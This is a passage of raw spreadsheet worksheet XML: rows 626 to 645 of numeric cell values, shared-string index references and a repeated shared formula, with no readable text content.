      <c r="D626" s="14"/>
      <c r="E626" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F626" s="14"/>
      <c r="G626" s="29">
        <v>1.0</v>
      </c>
      <c r="H626" s="29">
        <v>101.0</v>
      </c>
      <c r="I626" s="29">
        <v>46520.0</v>
      </c>
      <c r="J626" s="15"/>
      <c r="K626" s="15"/>
      <c r="L626" s="15"/>
      <c r="M626" s="15"/>
      <c r="N626" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O626" s="29">
        <v>0.0</v>
      </c>
      <c r="P626" s="29">
        <v>2.0</v>
      </c>
      <c r="Q626" s="15"/>
      <c r="R626" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S626" s="15"/>
      <c r="T626" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U626" s="5"/>
      <c r="V626" s="5"/>
      <c r="W626" s="47"/>
      <c r="X626" s="45"/>
      <c r="Y626" s="45"/>
      <c r="Z626" s="38" t="s">
        <v>2902</v>
      </c>
      <c r="AA626" s="39" t="s">
        <v>2903</v>
      </c>
      <c r="AB626" s="38" t="s">
        <v>2904</v>
      </c>
      <c r="AC626" s="40">
        <v>241897.0</v>
      </c>
      <c r="AD626" s="5"/>
      <c r="AE626" s="14"/>
      <c r="AF626" s="14"/>
    </row>
    <row r="627">
      <c r="A627" s="6">
        <f t="shared" si="1"/>
        <v>0.9540969788</v>
      </c>
      <c r="B627" s="29">
        <v>1.0</v>
      </c>
      <c r="C627" s="29">
        <v>36911.0</v>
      </c>
      <c r="D627" s="14"/>
      <c r="E627" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F627" s="14"/>
      <c r="G627" s="29">
        <v>7.0</v>
      </c>
      <c r="H627" s="29">
        <v>1063.0</v>
      </c>
      <c r="I627" s="29">
        <v>18541.0</v>
      </c>
      <c r="J627" s="15"/>
      <c r="K627" s="29">
        <v>414.0</v>
      </c>
      <c r="L627" s="15"/>
      <c r="M627" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N627" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O627" s="29">
        <v>2.0</v>
      </c>
      <c r="P627" s="29">
        <v>2.0</v>
      </c>
      <c r="Q627" s="15"/>
      <c r="R627" s="15"/>
      <c r="S627" s="15"/>
      <c r="T627" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U627" s="5"/>
      <c r="V627" s="5"/>
      <c r="W627" s="47"/>
      <c r="X627" s="45"/>
      <c r="Y627" s="45"/>
      <c r="Z627" s="38" t="s">
        <v>2905</v>
      </c>
      <c r="AA627" s="39" t="s">
        <v>2906</v>
      </c>
      <c r="AB627" s="38" t="s">
        <v>2907</v>
      </c>
      <c r="AC627" s="40">
        <v>36909.0</v>
      </c>
      <c r="AD627" s="5"/>
      <c r="AE627" s="14"/>
      <c r="AF627" s="14"/>
    </row>
    <row r="628">
      <c r="A628" s="6">
        <f t="shared" si="1"/>
        <v>0.7238289203</v>
      </c>
      <c r="B628" s="29">
        <v>1.0</v>
      </c>
      <c r="C628" s="14"/>
      <c r="D628" s="14"/>
      <c r="E628" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F628" s="14"/>
      <c r="G628" s="29">
        <v>2.0</v>
      </c>
      <c r="H628" s="29">
        <v>139.0</v>
      </c>
      <c r="I628" s="29">
        <v>200983.0</v>
      </c>
      <c r="J628" s="15"/>
      <c r="K628" s="29">
        <v>200983.0</v>
      </c>
      <c r="L628" s="15"/>
      <c r="M628" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N628" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O628" s="29">
        <v>0.0</v>
      </c>
      <c r="P628" s="29">
        <v>1.0</v>
      </c>
      <c r="Q628" s="15"/>
      <c r="R628" s="15"/>
      <c r="S628" s="15"/>
      <c r="T628" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U628" s="5"/>
      <c r="V628" s="5"/>
      <c r="W628" s="47"/>
      <c r="X628" s="45"/>
      <c r="Y628" s="45"/>
      <c r="Z628" s="38" t="s">
        <v>2908</v>
      </c>
      <c r="AA628" s="39" t="s">
        <v>2909</v>
      </c>
      <c r="AB628" s="38" t="s">
        <v>2910</v>
      </c>
      <c r="AC628" s="40">
        <v>204634.0</v>
      </c>
      <c r="AD628" s="5"/>
      <c r="AE628" s="14"/>
      <c r="AF628" s="14"/>
    </row>
    <row r="629">
      <c r="A629" s="6">
        <f t="shared" si="1"/>
        <v>0.8181814868</v>
      </c>
      <c r="B629" s="29">
        <v>1.0</v>
      </c>
      <c r="C629" s="15"/>
      <c r="D629" s="14"/>
      <c r="E629" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F629" s="14"/>
      <c r="G629" s="29">
        <v>0.0</v>
      </c>
      <c r="H629" s="29">
        <v>29.0</v>
      </c>
      <c r="I629" s="29">
        <v>282191.0</v>
      </c>
      <c r="J629" s="15"/>
      <c r="K629" s="29">
        <v>6253.0</v>
      </c>
      <c r="L629" s="15"/>
      <c r="M629" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N629" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O629" s="29">
        <v>0.0</v>
      </c>
      <c r="P629" s="29">
        <v>1.0</v>
      </c>
      <c r="Q629" s="15"/>
      <c r="R629" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S629" s="15"/>
      <c r="T629" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U629" s="5"/>
      <c r="V629" s="5"/>
      <c r="W629" s="47"/>
      <c r="X629" s="45"/>
      <c r="Y629" s="45"/>
      <c r="Z629" s="38" t="s">
        <v>2911</v>
      </c>
      <c r="AA629" s="39" t="s">
        <v>2912</v>
      </c>
      <c r="AB629" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC629" s="40">
        <v>264450.0</v>
      </c>
      <c r="AD629" s="5"/>
      <c r="AE629" s="14"/>
      <c r="AF629" s="14"/>
    </row>
    <row r="630">
      <c r="A630" s="6">
        <f t="shared" si="1"/>
        <v>0.9739084818</v>
      </c>
      <c r="B630" s="29">
        <v>1.0</v>
      </c>
      <c r="C630" s="29">
        <v>239298.0</v>
      </c>
      <c r="D630" s="14"/>
      <c r="E630" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F630" s="14"/>
      <c r="G630" s="29">
        <v>2.0</v>
      </c>
      <c r="H630" s="29">
        <v>22760.0</v>
      </c>
      <c r="I630" s="29">
        <v>243859.0</v>
      </c>
      <c r="J630" s="15"/>
      <c r="K630" s="15"/>
      <c r="L630" s="15"/>
      <c r="M630" s="15"/>
      <c r="N630" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O630" s="29">
        <v>1.0</v>
      </c>
      <c r="P630" s="29">
        <v>0.0</v>
      </c>
      <c r="Q630" s="15"/>
      <c r="R630" s="15"/>
      <c r="S630" s="15"/>
      <c r="T630" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U630" s="5"/>
      <c r="V630" s="5"/>
      <c r="W630" s="47"/>
      <c r="X630" s="45"/>
      <c r="Y630" s="45"/>
      <c r="Z630" s="38" t="s">
        <v>2913</v>
      </c>
      <c r="AA630" s="39" t="s">
        <v>2914</v>
      </c>
      <c r="AB630" s="38" t="s">
        <v>2810</v>
      </c>
      <c r="AC630" s="40">
        <v>239297.0</v>
      </c>
      <c r="AD630" s="5"/>
      <c r="AE630" s="14"/>
      <c r="AF630" s="14"/>
    </row>
    <row r="631">
      <c r="A631" s="6">
        <f t="shared" si="1"/>
        <v>0.6883850609</v>
      </c>
      <c r="B631" s="29">
        <v>1.0</v>
      </c>
      <c r="C631" s="29">
        <v>128757.0</v>
      </c>
      <c r="D631" s="14"/>
      <c r="E631" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F631" s="14"/>
      <c r="G631" s="29">
        <v>2.0</v>
      </c>
      <c r="H631" s="29">
        <v>205.0</v>
      </c>
      <c r="I631" s="29">
        <v>115932.0</v>
      </c>
      <c r="J631" s="15"/>
      <c r="K631" s="29">
        <v>98538.0</v>
      </c>
      <c r="L631" s="15"/>
      <c r="M631" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N631" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O631" s="29">
        <v>1.0</v>
      </c>
      <c r="P631" s="29">
        <v>0.0</v>
      </c>
      <c r="Q631" s="15"/>
      <c r="R631" s="15"/>
      <c r="S631" s="15"/>
      <c r="T631" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U631" s="5"/>
      <c r="V631" s="5"/>
      <c r="W631" s="47"/>
      <c r="X631" s="45"/>
      <c r="Y631" s="45"/>
      <c r="Z631" s="38" t="s">
        <v>2915</v>
      </c>
      <c r="AA631" s="39" t="s">
        <v>2916</v>
      </c>
      <c r="AB631" s="38" t="s">
        <v>2446</v>
      </c>
      <c r="AC631" s="40">
        <v>128746.0</v>
      </c>
      <c r="AD631" s="5"/>
      <c r="AE631" s="14"/>
      <c r="AF631" s="14"/>
    </row>
    <row r="632">
      <c r="A632" s="6">
        <f t="shared" si="1"/>
        <v>0.9402789417</v>
      </c>
      <c r="B632" s="29">
        <v>1.0</v>
      </c>
      <c r="C632" s="29">
        <v>52123.0</v>
      </c>
      <c r="D632" s="14"/>
      <c r="E632" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F632" s="14"/>
      <c r="G632" s="29">
        <v>198.0</v>
      </c>
      <c r="H632" s="29">
        <v>36540.0</v>
      </c>
      <c r="I632" s="29">
        <v>27326.0</v>
      </c>
      <c r="J632" s="15"/>
      <c r="K632" s="29">
        <v>47524.0</v>
      </c>
      <c r="L632" s="15"/>
      <c r="M632" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N632" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O632" s="29">
        <v>3.0</v>
      </c>
      <c r="P632" s="29">
        <v>5.0</v>
      </c>
      <c r="Q632" s="15"/>
      <c r="R632" s="15"/>
      <c r="S632" s="15"/>
      <c r="T632" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U632" s="5"/>
      <c r="V632" s="5"/>
      <c r="W632" s="47"/>
      <c r="X632" s="45"/>
      <c r="Y632" s="45"/>
      <c r="Z632" s="38" t="s">
        <v>2917</v>
      </c>
      <c r="AA632" s="39" t="s">
        <v>2918</v>
      </c>
      <c r="AB632" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC632" s="40">
        <v>52115.0</v>
      </c>
      <c r="AD632" s="5"/>
      <c r="AE632" s="14"/>
      <c r="AF632" s="14"/>
    </row>
    <row r="633">
      <c r="A633" s="6">
        <f t="shared" si="1"/>
        <v>0.4942110769</v>
      </c>
      <c r="B633" s="29">
        <v>1.0</v>
      </c>
      <c r="C633" s="15"/>
      <c r="D633" s="14"/>
      <c r="E633" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F633" s="14"/>
      <c r="G633" s="29">
        <v>1.0</v>
      </c>
      <c r="H633" s="29">
        <v>598.0</v>
      </c>
      <c r="I633" s="29">
        <v>34812.0</v>
      </c>
      <c r="J633" s="15"/>
      <c r="K633" s="15"/>
      <c r="L633" s="15"/>
      <c r="M633" s="14"/>
      <c r="N633" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O633" s="29">
        <v>3.0</v>
      </c>
      <c r="P633" s="29">
        <v>4.0</v>
      </c>
      <c r="Q633" s="15"/>
      <c r="R633" s="15"/>
      <c r="S633" s="15"/>
      <c r="T633" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U633" s="5"/>
      <c r="V633" s="5"/>
      <c r="W633" s="47"/>
      <c r="X633" s="45"/>
      <c r="Y633" s="45"/>
      <c r="Z633" s="38" t="s">
        <v>2919</v>
      </c>
      <c r="AA633" s="39" t="s">
        <v>2920</v>
      </c>
      <c r="AB633" s="38" t="s">
        <v>2921</v>
      </c>
      <c r="AC633" s="40">
        <v>119094.0</v>
      </c>
      <c r="AD633" s="5"/>
      <c r="AE633" s="14"/>
      <c r="AF633" s="14"/>
    </row>
    <row r="634">
      <c r="A634" s="6">
        <f t="shared" si="1"/>
        <v>0.621464515</v>
      </c>
      <c r="B634" s="29">
        <v>1.0</v>
      </c>
      <c r="C634" s="14"/>
      <c r="D634" s="14"/>
      <c r="E634" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F634" s="14"/>
      <c r="G634" s="29">
        <v>4.0</v>
      </c>
      <c r="H634" s="29">
        <v>652.0</v>
      </c>
      <c r="I634" s="29">
        <v>117477.0</v>
      </c>
      <c r="J634" s="15"/>
      <c r="K634" s="29">
        <v>117477.0</v>
      </c>
      <c r="L634" s="15"/>
      <c r="M634" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N634" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O634" s="29">
        <v>1.0</v>
      </c>
      <c r="P634" s="29">
        <v>0.0</v>
      </c>
      <c r="Q634" s="15"/>
      <c r="R634" s="15"/>
      <c r="S634" s="15"/>
      <c r="T634" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U634" s="5"/>
      <c r="V634" s="5"/>
      <c r="W634" s="47"/>
      <c r="X634" s="45"/>
      <c r="Y634" s="45"/>
      <c r="Z634" s="38" t="s">
        <v>2922</v>
      </c>
      <c r="AA634" s="39" t="s">
        <v>2923</v>
      </c>
      <c r="AB634" s="38" t="s">
        <v>2924</v>
      </c>
      <c r="AC634" s="40">
        <v>190831.0</v>
      </c>
      <c r="AD634" s="5"/>
      <c r="AE634" s="14"/>
      <c r="AF634" s="14"/>
    </row>
    <row r="635">
      <c r="A635" s="6">
        <f t="shared" si="1"/>
        <v>0.1057572478</v>
      </c>
      <c r="B635" s="29">
        <v>1.0</v>
      </c>
      <c r="C635" s="15"/>
      <c r="D635" s="14"/>
      <c r="E635" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F635" s="14"/>
      <c r="G635" s="29">
        <v>1.0</v>
      </c>
      <c r="H635" s="29">
        <v>199.0</v>
      </c>
      <c r="I635" s="29">
        <v>396.0</v>
      </c>
      <c r="J635" s="15"/>
      <c r="K635" s="15"/>
      <c r="L635" s="15"/>
      <c r="M635" s="15"/>
      <c r="N635" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O635" s="29">
        <v>0.0</v>
      </c>
      <c r="P635" s="29">
        <v>2.0</v>
      </c>
      <c r="Q635" s="15"/>
      <c r="R635" s="15"/>
      <c r="S635" s="15"/>
      <c r="T635" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U635" s="5"/>
      <c r="V635" s="5"/>
      <c r="W635" s="47"/>
      <c r="X635" s="45"/>
      <c r="Y635" s="45"/>
      <c r="Z635" s="38" t="s">
        <v>2925</v>
      </c>
      <c r="AA635" s="39" t="s">
        <v>2926</v>
      </c>
      <c r="AB635" s="38" t="s">
        <v>2927</v>
      </c>
      <c r="AC635" s="40">
        <v>129753.0</v>
      </c>
      <c r="AD635" s="5"/>
      <c r="AE635" s="14"/>
      <c r="AF635" s="14"/>
    </row>
    <row r="636">
      <c r="A636" s="6">
        <f t="shared" si="1"/>
        <v>0.9892642094</v>
      </c>
      <c r="B636" s="29">
        <v>1.0</v>
      </c>
      <c r="C636" s="15"/>
      <c r="D636" s="14"/>
      <c r="E636" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F636" s="14"/>
      <c r="G636" s="29">
        <v>4.0</v>
      </c>
      <c r="H636" s="29">
        <v>260706.0</v>
      </c>
      <c r="I636" s="29">
        <v>169737.0</v>
      </c>
      <c r="J636" s="15"/>
      <c r="K636" s="29">
        <v>169737.0</v>
      </c>
      <c r="L636" s="15"/>
      <c r="M636" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N636" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O636" s="29">
        <v>2.0</v>
      </c>
      <c r="P636" s="29">
        <v>6.0</v>
      </c>
      <c r="Q636" s="15"/>
      <c r="R636" s="15"/>
      <c r="S636" s="15"/>
      <c r="T636" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U636" s="5"/>
      <c r="V636" s="5"/>
      <c r="W636" s="47"/>
      <c r="X636" s="45"/>
      <c r="Y636" s="45"/>
      <c r="Z636" s="38" t="s">
        <v>2928</v>
      </c>
      <c r="AA636" s="39" t="s">
        <v>2929</v>
      </c>
      <c r="AB636" s="38" t="s">
        <v>2930</v>
      </c>
      <c r="AC636" s="40">
        <v>187152.0</v>
      </c>
      <c r="AD636" s="5"/>
      <c r="AE636" s="14"/>
      <c r="AF636" s="14"/>
    </row>
    <row r="637">
      <c r="A637" s="6">
        <f t="shared" si="1"/>
        <v>0.4979420934</v>
      </c>
      <c r="B637" s="29">
        <v>1.0</v>
      </c>
      <c r="C637" s="29">
        <v>1731.0</v>
      </c>
      <c r="D637" s="14"/>
      <c r="E637" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F637" s="14"/>
      <c r="G637" s="29">
        <v>47.0</v>
      </c>
      <c r="H637" s="29">
        <v>15379.0</v>
      </c>
      <c r="I637" s="29">
        <v>1135.0</v>
      </c>
      <c r="J637" s="5" t="s">
        <v>2931</v>
      </c>
      <c r="K637" s="29">
        <v>32746.0</v>
      </c>
      <c r="L637" s="15"/>
      <c r="M637" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N637" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O637" s="29">
        <v>2.0</v>
      </c>
      <c r="P637" s="29">
        <v>7.0</v>
      </c>
      <c r="Q637" s="15"/>
      <c r="R637" s="15"/>
      <c r="S637" s="15"/>
      <c r="T637" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U637" s="5"/>
      <c r="V637" s="5"/>
      <c r="W637" s="47"/>
      <c r="X637" s="45"/>
      <c r="Y637" s="45"/>
      <c r="Z637" s="38" t="s">
        <v>2932</v>
      </c>
      <c r="AA637" s="39" t="s">
        <v>2933</v>
      </c>
      <c r="AB637" s="38" t="s">
        <v>2934</v>
      </c>
      <c r="AC637" s="40">
        <v>1728.0</v>
      </c>
      <c r="AD637" s="5"/>
      <c r="AE637" s="14"/>
      <c r="AF637" s="14"/>
    </row>
    <row r="638">
      <c r="A638" s="6">
        <f t="shared" si="1"/>
        <v>0.1894522661</v>
      </c>
      <c r="B638" s="29">
        <v>1.0</v>
      </c>
      <c r="C638" s="29">
        <v>112056.0</v>
      </c>
      <c r="D638" s="14"/>
      <c r="E638" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F638" s="14"/>
      <c r="G638" s="29">
        <v>2.0</v>
      </c>
      <c r="H638" s="29">
        <v>684.0</v>
      </c>
      <c r="I638" s="29">
        <v>6253.0</v>
      </c>
      <c r="J638" s="15"/>
      <c r="K638" s="29">
        <v>6253.0</v>
      </c>
      <c r="L638" s="15"/>
      <c r="M638" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N638" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O638" s="29">
        <v>2.0</v>
      </c>
      <c r="P638" s="29">
        <v>1.0</v>
      </c>
      <c r="Q638" s="15"/>
      <c r="R638" s="15"/>
      <c r="S638" s="15"/>
      <c r="T638" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U638" s="5"/>
      <c r="V638" s="5"/>
      <c r="W638" s="47"/>
      <c r="X638" s="45"/>
      <c r="Y638" s="45"/>
      <c r="Z638" s="38" t="s">
        <v>2935</v>
      </c>
      <c r="AA638" s="39" t="s">
        <v>2936</v>
      </c>
      <c r="AB638" s="38" t="s">
        <v>1296</v>
      </c>
      <c r="AC638" s="40">
        <v>111954.0</v>
      </c>
      <c r="AD638" s="5"/>
      <c r="AE638" s="14"/>
      <c r="AF638" s="14"/>
    </row>
    <row r="639">
      <c r="A639" s="6">
        <f t="shared" si="1"/>
        <v>0.01370279573</v>
      </c>
      <c r="B639" s="29">
        <v>1.0</v>
      </c>
      <c r="C639" s="29">
        <v>97931.0</v>
      </c>
      <c r="D639" s="14"/>
      <c r="E639" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F639" s="14"/>
      <c r="G639" s="29">
        <v>8.0</v>
      </c>
      <c r="H639" s="29">
        <v>809.0</v>
      </c>
      <c r="I639" s="29">
        <v>72327.0</v>
      </c>
      <c r="J639" s="15"/>
      <c r="K639" s="29">
        <v>72327.0</v>
      </c>
      <c r="L639" s="15"/>
      <c r="M639" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N639" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O639" s="29">
        <v>3.0</v>
      </c>
      <c r="P639" s="29">
        <v>0.0</v>
      </c>
      <c r="Q639" s="15"/>
      <c r="R639" s="15"/>
      <c r="S639" s="15"/>
      <c r="T639" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U639" s="5"/>
      <c r="V639" s="5"/>
      <c r="W639" s="47"/>
      <c r="X639" s="45"/>
      <c r="Y639" s="45"/>
      <c r="Z639" s="38" t="s">
        <v>2937</v>
      </c>
      <c r="AA639" s="39" t="s">
        <v>2938</v>
      </c>
      <c r="AB639" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC639" s="40">
        <v>97929.0</v>
      </c>
      <c r="AD639" s="5"/>
      <c r="AE639" s="14"/>
      <c r="AF639" s="14"/>
    </row>
    <row r="640">
      <c r="A640" s="6">
        <f t="shared" si="1"/>
        <v>0.5949610849</v>
      </c>
      <c r="B640" s="29">
        <v>1.0</v>
      </c>
      <c r="C640" s="15"/>
      <c r="D640" s="14"/>
      <c r="E640" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F640" s="14"/>
      <c r="G640" s="29">
        <v>1.0</v>
      </c>
      <c r="H640" s="29">
        <v>93.0</v>
      </c>
      <c r="I640" s="29">
        <v>6341.0</v>
      </c>
      <c r="J640" s="15"/>
      <c r="K640" s="15"/>
      <c r="L640" s="15"/>
      <c r="M640" s="15"/>
      <c r="N640" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O640" s="29">
        <v>0.0</v>
      </c>
      <c r="P640" s="29">
        <v>2.0</v>
      </c>
      <c r="Q640" s="15"/>
      <c r="R640" s="15"/>
      <c r="S640" s="15"/>
      <c r="T640" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U640" s="5"/>
      <c r="V640" s="5"/>
      <c r="W640" s="47"/>
      <c r="X640" s="45"/>
      <c r="Y640" s="45"/>
      <c r="Z640" s="38" t="s">
        <v>2939</v>
      </c>
      <c r="AA640" s="39" t="s">
        <v>2940</v>
      </c>
      <c r="AB640" s="38" t="s">
        <v>2941</v>
      </c>
      <c r="AC640" s="40">
        <v>219020.0</v>
      </c>
      <c r="AD640" s="5"/>
      <c r="AE640" s="14"/>
      <c r="AF640" s="14"/>
    </row>
    <row r="641">
      <c r="A641" s="6">
        <f t="shared" si="1"/>
        <v>0.3366803221</v>
      </c>
      <c r="B641" s="29">
        <v>1.0</v>
      </c>
      <c r="C641" s="15"/>
      <c r="D641" s="15"/>
      <c r="E641" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F641" s="15"/>
      <c r="G641" s="29">
        <v>2.0</v>
      </c>
      <c r="H641" s="29">
        <v>791.0</v>
      </c>
      <c r="I641" s="15"/>
      <c r="J641" s="5" t="s">
        <v>2942</v>
      </c>
      <c r="K641" s="15"/>
      <c r="L641" s="15"/>
      <c r="M641" s="15"/>
      <c r="N641" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O641" s="29">
        <v>3.0</v>
      </c>
      <c r="P641" s="29">
        <v>0.0</v>
      </c>
      <c r="Q641" s="15"/>
      <c r="R641" s="15"/>
      <c r="S641" s="15"/>
      <c r="T641" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U641" s="5"/>
      <c r="V641" s="5"/>
      <c r="W641" s="45"/>
      <c r="X641" s="45"/>
      <c r="Y641" s="45"/>
      <c r="Z641" s="38" t="s">
        <v>2943</v>
      </c>
      <c r="AA641" s="39" t="s">
        <v>2944</v>
      </c>
      <c r="AB641" s="38" t="s">
        <v>2531</v>
      </c>
      <c r="AC641" s="40">
        <v>79064.0</v>
      </c>
      <c r="AD641" s="5"/>
      <c r="AE641" s="5"/>
      <c r="AF641" s="5"/>
    </row>
    <row r="642">
      <c r="A642" s="6">
        <f t="shared" si="1"/>
        <v>0.2362412598</v>
      </c>
      <c r="B642" s="29">
        <v>1.0</v>
      </c>
      <c r="C642" s="15"/>
      <c r="D642" s="14"/>
      <c r="E642" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F642" s="14"/>
      <c r="G642" s="29">
        <v>0.0</v>
      </c>
      <c r="H642" s="29">
        <v>107.0</v>
      </c>
      <c r="I642" s="29">
        <v>90282.0</v>
      </c>
      <c r="J642" s="15"/>
      <c r="K642" s="15"/>
      <c r="L642" s="15"/>
      <c r="M642" s="15"/>
      <c r="N642" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O642" s="29">
        <v>1.0</v>
      </c>
      <c r="P642" s="29">
        <v>1.0</v>
      </c>
      <c r="Q642" s="15"/>
      <c r="R642" s="15"/>
      <c r="S642" s="15"/>
      <c r="T642" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U642" s="5"/>
      <c r="V642" s="5"/>
      <c r="W642" s="47"/>
      <c r="X642" s="45"/>
      <c r="Y642" s="45"/>
      <c r="Z642" s="38" t="s">
        <v>2945</v>
      </c>
      <c r="AA642" s="39" t="s">
        <v>2946</v>
      </c>
      <c r="AB642" s="38" t="s">
        <v>2947</v>
      </c>
      <c r="AC642" s="40">
        <v>240066.0</v>
      </c>
      <c r="AD642" s="5"/>
      <c r="AE642" s="14"/>
      <c r="AF642" s="14"/>
    </row>
    <row r="643">
      <c r="A643" s="6">
        <f t="shared" si="1"/>
        <v>0.9847169344</v>
      </c>
      <c r="B643" s="29">
        <v>1.0</v>
      </c>
      <c r="C643" s="15"/>
      <c r="D643" s="14"/>
      <c r="E643" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F643" s="14"/>
      <c r="G643" s="29">
        <v>1.0</v>
      </c>
      <c r="H643" s="29">
        <v>1613.0</v>
      </c>
      <c r="I643" s="29">
        <v>94334.0</v>
      </c>
      <c r="J643" s="15"/>
      <c r="K643" s="29">
        <v>94334.0</v>
      </c>
      <c r="L643" s="15"/>
      <c r="M643" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N643" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O643" s="29">
        <v>1.0</v>
      </c>
      <c r="P643" s="29">
        <v>1.0</v>
      </c>
      <c r="Q643" s="15"/>
      <c r="R643" s="15"/>
      <c r="S643" s="15"/>
      <c r="T643" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U643" s="5"/>
      <c r="V643" s="5"/>
      <c r="W643" s="47"/>
      <c r="X643" s="45"/>
      <c r="Y643" s="45"/>
      <c r="Z643" s="38" t="s">
        <v>2948</v>
      </c>
      <c r="AA643" s="39" t="s">
        <v>2949</v>
      </c>
      <c r="AB643" s="38" t="s">
        <v>2950</v>
      </c>
      <c r="AC643" s="40">
        <v>107980.0</v>
      </c>
      <c r="AD643" s="5"/>
      <c r="AE643" s="14"/>
      <c r="AF643" s="14"/>
    </row>
    <row r="644">
      <c r="A644" s="6">
        <f t="shared" si="1"/>
        <v>0.2907543174</v>
      </c>
      <c r="B644" s="29">
        <v>1.0</v>
      </c>
      <c r="C644" s="29">
        <v>13578.0</v>
      </c>
      <c r="D644" s="14"/>
      <c r="E644" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F644" s="14"/>
      <c r="G644" s="29">
        <v>4.0</v>
      </c>
      <c r="H644" s="29">
        <v>408.0</v>
      </c>
      <c r="I644" s="29">
        <v>8241.0</v>
      </c>
      <c r="J644" s="15"/>
      <c r="K644" s="15"/>
      <c r="L644" s="15"/>
      <c r="M644" s="14"/>
      <c r="N644" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O644" s="29">
        <v>1.0</v>
      </c>
      <c r="P644" s="29">
        <v>1.0</v>
      </c>
      <c r="Q644" s="15"/>
      <c r="R644" s="15"/>
      <c r="S644" s="15"/>
      <c r="T644" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U644" s="5"/>
      <c r="V644" s="5"/>
      <c r="W644" s="47"/>
      <c r="X644" s="45"/>
      <c r="Y644" s="45"/>
      <c r="Z644" s="38" t="s">
        <v>2951</v>
      </c>
      <c r="AA644" s="39" t="s">
        <v>2952</v>
      </c>
      <c r="AB644" s="38" t="s">
        <v>2953</v>
      </c>
      <c r="AC644" s="40">
        <v>13577.0</v>
      </c>
      <c r="AD644" s="5"/>
      <c r="AE644" s="14"/>
      <c r="AF644" s="14"/>
    </row>
    <row r="645">
      <c r="A645" s="6">
        <f t="shared" si="1"/>
        <v>0.2357763541</v>
      </c>
      <c r="B645" s="29">
        <v>1.0</v>
      </c>
      <c r="C645" s="15"/>
      <c r="D645" s="14"/>
      <c r="E645" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F645" s="14"/>
      <c r="G645" s="29">
        <v>2.0</v>
      </c>
      <c r="H645" s="29">
        <v>166.0</v>
      </c>
      <c r="I645" s="29">
        <v>55595.0</v>
      </c>
      <c r="J645" s="15"/>
      <c r="K645" s="29">
        <v>55595.0</v>
      </c>
      <c r="L645" s="15"/>
      <c r="M645" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N645" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O645" s="29">
        <v>4.0</v>
      </c>
      <c r="P645" s="29">
        <v>3.0</v>
      </c>
      <c r="Q645" s="15"/>
      <c r="R645" s="15"/>
      <c r="S645" s="15"/>
      <c r="T645" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U645" s="5"/>
      <c r="V645" s="5"/>
      <c r="W645" s="47"/>
      <c r="X645" s="45"/>
      <c r="Y645" s="45"/>
      <c r="Z645" s="38" t="s">
        <v>2954</v>
      </c>
      <c r="AA645" s="39" t="s">
        <v>2955</v>
      </c>
